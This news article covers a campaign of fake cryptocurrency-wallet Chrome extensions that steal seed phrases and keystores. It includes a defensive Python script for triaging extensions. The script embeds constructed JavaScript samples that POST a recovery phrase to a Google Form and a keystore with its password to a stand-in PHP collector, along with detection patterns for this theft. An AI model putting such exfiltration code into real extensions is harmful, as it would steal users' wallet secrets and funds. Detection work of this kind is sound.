Researchers have uncovered a large campaign pushing fake browser extensions, including Google Chrome extensions, that impersonate popular cryptocurrency wallet brands and are promoted through Google Ads and other ad channels.
The extensions aim to steal mnemonic (seed) phrases, private keys and keystore files from users and send them to a server controlled by the attacker.
49 Chrome extensions were detected
The malicious cryptocurrency wallet extensions were found by Harry Denley, Director of Security at MyCrypto. They impersonate popular brands such as Trezor, Jaxx, Electrum, MyEtherWallet, MetaMask, Exodus and KeepKey.
As soon as the user enters their secrets into one of these fake extensions, the extension sends an HTTP POST request containing them to a command-and-control (C2) server operated by the attacker. Nothing is done locally with the data; the extension exists only to capture it and forward it.
Most of the C2 servers were registered between March and April 2020; the oldest of them is ledger.productions.
Some of the extensions submit the phished data to a Google Form, while others post it to their own PHP scripts, the researchers said.
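The two exfiltration paths just described (a Google Form sink, or a custom PHP collector on an attacker domain) are what an incident responder looks for when triaging extensions on a compromised machine. The Python script below is an added example, not MyCrypto's tooling or code from the campaign: it walks an unpacked extension tree, and flags any script that both handles wallet secrets (mnemonic, private key, keystore) and contains an outbound send to a host that is neither the wallet vendor's domain nor, specifically, a Google Forms endpoint. The extension IDs, hostnames and JavaScript samples embedded in `demo()` are constructed for illustration.

```python
"""Static triage of unpacked Chrome extensions for the wallet-phishing
exfiltration pattern: secret captured in extension JS, POSTed elsewhere.
Added example; all hostnames, paths and samples below are constructed."""
import os
import re
import tempfile
from dataclasses import dataclass, field
from urllib.parse import urlsplit

# Terms a wallet-phishing extension must touch to capture what it is after.
SECRET_TERMS = re.compile(
    r"\b(mnemonic|seed\s*phrase|recovery\s*phrase|private\s*key|keystore)\b",
    re.IGNORECASE)
# Absolute http(s) URLs in string literals (non-capturing groups so findall
# returns whole matches).
URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?::\d+)?(?:/[^\s'\"`)]*)?")
# Ways browser JS sends data out: fetch, XHR, sendBeacon, explicit POST.
SEND_RE = re.compile(
    r"fetch\s*\(|XMLHttpRequest|sendBeacon\s*\(|\.open\s*\(\s*['\"]POST")


@dataclass
class Finding:
    ext_id: str
    path: str
    secret_terms: list = field(default_factory=list)
    external_sinks: list = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        # A real wallet reads secrets too; reading them AND sending to a
        # non-vendor host is the tell, so both conditions are required.
        return bool(self.secret_terms) and bool(self.external_sinks)


def _allowed(host: str, vendor_hosts: set) -> bool:
    return any(host == v or host.endswith("." + v) for v in vendor_hosts)


def triage_source(ext_id: str, path: str, source: str, vendor_hosts: set) -> Finding:
    """Classify one script. vendor_hosts is the allowlist for this extension."""
    f = Finding(ext_id, path)
    f.secret_terms = sorted({m.group(0).lower() for m in SECRET_TERMS.finditer(source)})
    if SEND_RE.search(source):
        for url in sorted(set(URL_RE.findall(source))):
            host = (urlsplit(url).hostname or "").lower()
            if host == "docs.google.com" and "/forms/" in url:
                f.external_sinks.append("google-form " + url)   # Google Form sink
            elif not _allowed(host, vendor_hosts):
                f.external_sinks.append(url)                    # custom collector
    return f


def scan_extensions(root: str, vendor_hosts: set) -> list:
    """Walk <root>/<ext_id>/<version>/*.js (Chrome's profile layout) and
    return only the findings that meet the suspicious criterion."""
    findings = []
    for dirpath, _, files in os.walk(root):
        ext_id = os.path.relpath(dirpath, root).split(os.sep)[0]
        for name in files:
            if not name.endswith(".js"):
                continue
            full = os.path.join(dirpath, name)
            with open(full, encoding="utf-8", errors="replace") as fh:
                f = triage_source(ext_id, full, fh.read(), vendor_hosts)
            if f.suspicious:
                findings.append(f)
    return findings


# Constructed samples (not real extension code).
MALICIOUS_FORM_JS = """
// fake wallet: forwards the recovery phrase to a Google Form
document.getElementById('restore').addEventListener('submit', e => {
  e.preventDefault();
  const phrase = document.getElementById('mnemonic').value;
  fetch('https://docs.google.com/forms/d/e/EXAMPLE/formResponse', {
    method: 'POST', mode: 'no-cors', body: new URLSearchParams({'entry.1': phrase})
  });
});
"""
MALICIOUS_PHP_JS = """
// fake hardware-wallet companion: posts keystore to a PHP collector
function importKeystore(keystoreJson, password) {
  const xhr = new XMLHttpRequest();
  xhr.open('POST', 'https://updates.wallet-support.example/save.php');
  xhr.send(JSON.stringify({keystore: keystoreJson, password}));
}
"""
BENIGN_JS = """
// genuine wallet: only talks to its own backend
async function restore(mnemonic) {
  const wallet = deriveFromMnemonic(mnemonic);
  await fetch('https://api.wallet.example/v1/balance?addr=' + wallet.address);
}
"""


def demo() -> list:
    """Write the samples into a throwaway profile tree and return the IDs flagged."""
    samples = {"fakewalletextensionid0000": MALICIOUS_FORM_JS,
               "fakeledgerextensionid0000": MALICIOUS_PHP_JS,
               "realwalletextensionid0000": BENIGN_JS}
    with tempfile.TemporaryDirectory() as root:
        for ext_id, src in samples.items():
            d = os.path.join(root, ext_id, "1.0.0")
            os.makedirs(d)
            with open(os.path.join(d, "content.js"), "w", encoding="utf-8") as fh:
                fh.write(src)
        return sorted(f.ext_id for f in scan_extensions(root, {"wallet.example"}))


if __name__ == "__main__":
    print(demo())
```

The allowlist matters: a genuine wallet extension legitimately reads the mnemonic and talks to its vendor's API, so the script only fires when secrets and a non-vendor sink appear together. Pointing `scan_extensions` at a real profile's `Extensions` directory and supplying each vendor's domains gives a quick first pass; confirming a hit still means reading the flagged script.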
"Some of the extensions had a network of fake users rating the extension 5 stars and giving positive feedback on it to entice users to download it. Most of the positive reviews from fake users were of low quality, such as 'good', 'useful application' or 'legit extension'."
All of the malicious extensions were reported to Google and removed from the Chrome Web Store within 24 hours.
"An analysis of our data shows that the malicious extensions arrived at a slow pace in February 2020, increased their traffic through March 2020, and then in April 2020 increased their traffic a lot," said Harry Denley.
Attackers abusing the Chrome Web Store are nothing new: more than 500 malicious Chrome extensions were recently removed from the official store.